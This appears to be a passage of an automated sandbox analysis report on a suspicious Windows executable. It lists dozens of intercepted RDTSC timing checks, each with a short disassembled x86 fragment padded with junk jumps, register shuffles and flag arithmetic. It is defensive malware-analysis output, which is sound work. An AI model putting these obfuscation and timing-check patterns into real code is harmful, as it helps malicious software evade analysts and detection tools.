Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70506CB second address: 705073B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+60h] 0x0000000c pushad 0x0000000d call 00007F5FC0CE52CCh 0x00000012 pop ecx 0x00000013 jmp 00007F5FC0CE52D7h 0x00000018 popad 0x00000019 mov dword ptr [esi+24h], eax 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F5FC0CE52D4h 0x00000023 sbb ecx, 70469C18h 0x00000029 jmp 00007F5FC0CE52CBh 0x0000002e popfd 0x0000002f popad 0x00000030 mov eax, dword ptr [ebx+64h] 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705073B second address: 7050756 instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movzx ecx, dx 0x00000009 popad 0x0000000a mov dword ptr [esi+28h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5FC0E77A0Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050756 second address: 7050768 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FC0CE52CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7050768 second address: 7050808 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+68h] 0x0000000e pushad 0x0000000f pushad 0x00000010 movzx esi, bx 0x00000013 mov dx, CC52h 0x00000017 popad 0x00000018 pushfd 0x00000019 jmp 00007F5FC0E77A13h 0x0000001e xor al, 0000004Eh 0x00000021 jmp 00007F5FC0E77A19h 0x00000026 popfd 0x00000027 popad 0x00000028 mov dword ptr [esi+2Ch], eax 0x0000002b pushad 0x0000002c mov dl, ah 0x0000002e mov dh, B6h 0x00000030 popad 0x00000031 mov ax, word ptr [ebx+6Ch] 0x00000035 jmp 00007F5FC0E77A10h 0x0000003a mov word ptr [esi+30h], ax 0x0000003e pushad 0x0000003f mov cx, A50Dh 0x00000043 pushfd 0x00000044 jmp 00007F5FC0E77A0Ah 0x00000049 sbb cx, E728h 0x0000004e jmp 00007F5FC0E77A0Bh 0x00000053 popfd 0x00000054 popad 0x00000055 mov ax, word ptr [ebx+00000088h] 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7050808 second address: 705080C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 705080C second address: 7050827 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7050827 second address: 705082D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 705082D second address: 7050831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7050831 second address: 705085F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov word ptr [esi+32h], ax 0x0000000f pushad 0x00000010 pushad 0x00000011 mov si, 2201h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 mov bx, ax 0x0000001b popad 0x0000001c mov eax, dword ptr [ebx+0000008Ch] 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 705085F second address: 7050863 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7050863 second address: 7050869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7050869 second address: 70508EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, A6CFh 0x00000007 mov cl, E0h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esi+34h], eax 0x0000000f pushad 0x00000010 call 00007F5FC0E77A0Dh 0x00000015 movzx esi, dx 0x00000018 pop ebx 0x00000019 pushfd 0x0000001a jmp 00007F5FC0E77A0Ah 0x0000001f xor eax, 5F8ED0A8h 0x00000025 jmp 00007F5FC0E77A0Bh 0x0000002a popfd 0x0000002b popad 0x0000002c mov eax, dword ptr [ebx+18h] 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 call 00007F5FC0E77A0Bh 0x00000037 pop eax 0x00000038 pushfd 0x00000039 jmp 00007F5FC0E77A19h 0x0000003e adc cl, 00000076h 0x00000041 jmp 00007F5FC0E77A11h 0x00000046 popfd 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 70508EA second address: 7050955 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+38h], eax 0x0000000c pushad 0x0000000d mov esi, 04B785F3h 0x00000012 pushfd 0x00000013 jmp 00007F5FC0CE52D8h 0x00000018 and ecx, 15C8A2F8h 0x0000001e jmp 00007F5FC0CE52CBh 0x00000023 popfd 0x00000024 popad 0x00000025 mov eax, dword ptr [ebx+1Ch] 0x00000028 jmp 00007F5FC0CE52D6h 0x0000002d mov dword ptr [esi+3Ch], eax 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7050955 second address: 7050959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7050959 second address: 70509BE instructions: 0x00000000 rdtsc 0x00000002 movzx eax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov eax, dword ptr [ebx+20h] 0x0000000b pushad 0x0000000c pushad 0x0000000d mov dx, 44A0h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push edx 0x00000015 pop ebx 0x00000016 popad 0x00000017 mov dword ptr [esi+40h], eax 0x0000001a pushad 0x0000001b mov eax, 4B5CD9C9h 0x00000020 pushfd 0x00000021 jmp 00007F5FC0CE52D6h 0x00000026 adc al, 00000018h 0x00000029 jmp 00007F5FC0CE52CBh 0x0000002e popfd 0x0000002f popad 0x00000030 lea eax, dword ptr [ebx+00000080h] 0x00000036 pushad 0x00000037 mov eax, 04749FEBh 0x0000003c call 00007F5FC0CE52D0h 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 70509BE second address: 7050A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push 00000001h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F5FC0E77A18h 0x00000011 and ch, FFFFFFD8h 0x00000014 jmp 00007F5FC0E77A0Bh 0x00000019 popfd 0x0000001a jmp 00007F5FC0E77A18h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7050A0A second address: 7050A7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007F5FC0CE52CDh 0x0000000b and ecx, 4F68C926h 0x00000011 jmp 00007F5FC0CE52D1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a nop 0x0000001b jmp 00007F5FC0CE52CEh 0x00000020 push eax 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F5FC0CE52D1h 0x00000028 and cl, 00000036h 0x0000002b jmp 00007F5FC0CE52D1h 0x00000030 popfd 0x00000031 popad 0x00000032 nop 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 pushad 0x00000037 popad 0x00000038 mov ebx, 3B3C9058h 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7050A7D second address: 7050AAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, BCh 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a lea eax, dword ptr [ebp-10h] 0x0000000d pushad 0x0000000e movsx ebx, ax 0x00000011 mov bx, cx 0x00000014 popad 0x00000015 nop 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5FC0E77A15h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7050AAA second address: 7050ADB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 mov di, 4C7Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007F5FC0CE52D4h 0x00000013 nop 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5FC0CE52CAh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7050ADB second address: 7050AEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7050BAF second address: 7050BB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7050BB3 second address: 7050BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7050BB9 second address: 7050BD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FC0CE52D3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7050BD0 second address: 7050BD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7050BD4 second address: 7050C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F602F5C3DADh 0x0000000e jmp 00007F5FC0CE52D5h 0x00000013 mov eax, dword ptr [ebp-0Ch] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5FC0CE52CDh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7050C09 second address: 7050C27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7050C27 second address: 7050C2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7050C2D second address: 7050C7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 mov eax, 47274B43h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d lea eax, dword ptr [ebx+78h] 0x00000010 jmp 00007F5FC0E77A16h 0x00000015 push 00000001h 0x00000017 jmp 00007F5FC0E77A10h 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 call 00007F5FC0E77A0Dh 0x00000025 pop ecx 0x00000026 mov bh, 79h 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7050C7A second address: 7050CBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F5FC0CE52D9h 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5FC0CE52CDh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7050CBB second address: 7050CC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7050CC1 second address: 7050CC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7050CC5 second address: 7050D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-08h] 0x0000000b jmp 00007F5FC0E77A0Fh 0x00000010 nop 0x00000011 pushad 0x00000012 pushad 0x00000013 jmp 00007F5FC0E77A12h 0x00000018 pushfd 0x00000019 jmp 00007F5FC0E77A12h 0x0000001e or eax, 74CE47E8h 0x00000024 jmp 00007F5FC0E77A0Bh 0x00000029 popfd 0x0000002a popad 0x0000002b pushad 0x0000002c call 00007F5FC0E77A16h 0x00000031 pop eax 0x00000032 pushfd 0x00000033 jmp 00007F5FC0E77A0Bh 0x00000038 and ecx, 5598B7DEh 0x0000003e jmp 00007F5FC0E77A19h 0x00000043 popfd 0x00000044 popad 0x00000045 popad 0x00000046 push eax 0x00000047 pushad 0x00000048 mov bl, 13h 0x0000004a mov di, si 0x0000004d popad 0x0000004e nop 0x0000004f pushad 0x00000050 pushfd 0x00000051 jmp 00007F5FC0E77A10h 0x00000056 sbb eax, 47290F08h 0x0000005c jmp 00007F5FC0E77A0Bh 0x00000061 popfd 0x00000062 push eax 0x00000063 push edx 0x00000064 movzx eax, dx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7050D92 second address: 7050D96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7050DAF second address: 7050DC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FC0E77A0Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7050DC1 second address: 7050DE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edi, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov ah, dh 0x00000012 call 00007F5FC0CE52CCh 0x00000017 pop ecx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7050DE7 second address: 7050E02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FC0E77A17h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7050E02 second address: 7050ECE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a jmp 00007F5FC0CE52D5h 0x0000000f js 00007F602F5C3B5Eh 0x00000015 jmp 00007F5FC0CE52CEh 0x0000001a mov eax, dword ptr [ebp-04h] 0x0000001d pushad 0x0000001e movzx ecx, di 0x00000021 pushfd 0x00000022 jmp 00007F5FC0CE52D3h 0x00000027 and ecx, 48C80D7Eh 0x0000002d jmp 00007F5FC0CE52D9h 0x00000032 popfd 0x00000033 popad 0x00000034 mov dword ptr [esi+08h], eax 0x00000037 jmp 00007F5FC0CE52CEh 0x0000003c lea eax, dword ptr [ebx+70h] 0x0000003f jmp 00007F5FC0CE52D0h 0x00000044 push 00000001h 0x00000046 pushad 0x00000047 pushfd 0x00000048 jmp 00007F5FC0CE52CEh 0x0000004d add ecx, 0C8F92D8h 0x00000053 jmp 00007F5FC0CE52CBh 0x00000058 popfd 0x00000059 push eax 0x0000005a push edi 0x0000005b pop esi 0x0000005c pop ebx 0x0000005d popad 0x0000005e nop 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F5FC0CE52CDh 0x00000066 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7050ECE second address: 7050F9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov dx, 3DB2h 0x0000000f pushfd 0x00000010 jmp 00007F5FC0E77A13h 0x00000015 add ah, FFFFFFAEh 0x00000018 jmp 00007F5FC0E77A19h 0x0000001d popfd 0x0000001e popad 0x0000001f nop 0x00000020 jmp 00007F5FC0E77A0Eh 0x00000025 lea eax, dword ptr [ebp-18h] 0x00000028 jmp 00007F5FC0E77A10h 0x0000002d nop 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F5FC0E77A0Eh 0x00000035 and ecx, 33320B88h 0x0000003b jmp 00007F5FC0E77A0Bh 0x00000040 popfd 0x00000041 jmp 00007F5FC0E77A18h 0x00000046 popad 0x00000047 push eax 0x00000048 jmp 00007F5FC0E77A0Bh 0x0000004d nop 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F5FC0E77A15h 0x00000055 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7050F9D second address: 7050FA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7050FA3 second address: 7050FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7050FA7 second address: 7050FAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 70510DC second address: 70510F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 70510F1 second address: 7051101 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FC0CE52CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7051101 second address: 7051163 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub eax, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F5FC0E77A10h 0x00000016 or cl, 00000008h 0x00000019 jmp 00007F5FC0E77A0Bh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F5FC0E77A18h 0x00000025 sub eax, 555E2A68h 0x0000002b jmp 00007F5FC0E77A0Bh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7051163 second address: 7051169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7051169 second address: 705116D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 705116D second address: 70511AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lock cmpxchg dword ptr [edx], ecx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F5FC0CE52CDh 0x00000013 sbb si, 1486h 0x00000018 jmp 00007F5FC0CE52D1h 0x0000001d popfd 0x0000001e push eax 0x0000001f mov dl, 44h 0x00000021 pop esi 0x00000022 popad 0x00000023 pop edi 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov edx, esi 0x00000029 movzx eax, bx 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 70511AE second address: 705124D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5FC0E77A14h 0x00000008 pushfd 0x00000009 jmp 00007F5FC0E77A12h 0x0000000e add esi, 67098CB8h 0x00000014 jmp 00007F5FC0E77A0Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d test eax, eax 0x0000001f jmp 00007F5FC0E77A16h 0x00000024 jne 00007F602F755EDDh 0x0000002a pushad 0x0000002b call 00007F5FC0E77A0Eh 0x00000030 mov cx, 6CE1h 0x00000034 pop eax 0x00000035 call 00007F5FC0E77A17h 0x0000003a mov edi, esi 0x0000003c pop eax 0x0000003d popad 0x0000003e mov edx, dword ptr [ebp+08h] 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F5FC0E77A0Eh 0x00000048 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 705124D second address: 705128F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi] 0x0000000b jmp 00007F5FC0CE52D6h 0x00000010 mov dword ptr [edx], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5FC0CE52D7h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 705128F second address: 70512D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+04h] 0x0000000c pushad 0x0000000d push esi 0x0000000e movsx edi, cx 0x00000011 pop ecx 0x00000012 mov edi, 5FC93AF8h 0x00000017 popad 0x00000018 mov dword ptr [edx+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e call 00007F5FC0E77A0Fh 0x00000023 pop eax 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 70512D2 second address: 705132C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+08h] 0x0000000c pushad 0x0000000d mov esi, 33F2EB5Dh 0x00000012 mov bx, si 0x00000015 popad 0x00000016 mov dword ptr [edx+08h], eax 0x00000019 jmp 00007F5FC0CE52D4h 0x0000001e mov eax, dword ptr [esi+0Ch] 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F5FC0CE52D7h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 705132C second address: 705139D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5FC0E77A0Fh 0x00000009 adc cx, CEDEh 0x0000000e jmp 00007F5FC0E77A19h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [edx+0Ch], eax 0x0000001a pushad 0x0000001b mov bx, 143Eh 0x0000001f mov ebx, 7897364Ah 0x00000024 popad 0x00000025 mov eax, dword ptr [esi+10h] 0x00000028 jmp 00007F5FC0E77A11h 0x0000002d mov dword ptr [edx+10h], eax 0x00000030 jmp 00007F5FC0E77A0Eh 0x00000035 mov eax, dword ptr [esi+14h] 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 705139D second address: 70513A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 70513A3 second address: 70513C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+14h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov eax, 7B925CF3h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 70513C6 second address: 70513FE instructions: 0x00000000 rdtsc 0x00000002 call 00007F5FC0CE52D8h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dx, 4136h 0x0000000e popad 0x0000000f mov eax, dword ptr [esi+18h] 0x00000012 pushad 0x00000013 movsx ebx, ax 0x00000016 mov ecx, 55B0074Bh 0x0000001b popad 0x0000001c mov dword ptr [edx+18h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov ecx, ebx 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 70513FE second address: 7051489 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5FC0E77A11h 0x00000009 sbb ax, CD46h 0x0000000e jmp 00007F5FC0E77A11h 0x00000013 popfd 0x00000014 push eax 0x00000015 pop ebx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, dword ptr [esi+1Ch] 0x0000001c pushad 0x0000001d mov ch, 1Ah 0x0000001f mov dl, 39h 0x00000021 popad 0x00000022 mov dword ptr [edx+1Ch], eax 0x00000025 jmp 00007F5FC0E77A0Ch 0x0000002a mov eax, dword ptr [esi+20h] 0x0000002d jmp 00007F5FC0E77A10h 0x00000032 mov dword ptr [edx+20h], eax 0x00000035 jmp 00007F5FC0E77A10h 0x0000003a mov eax, dword ptr [esi+24h] 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F5FC0E77A17h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 7051489 second address: 70514A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FC0CE52D4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: 70514A1 second address: 70514A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
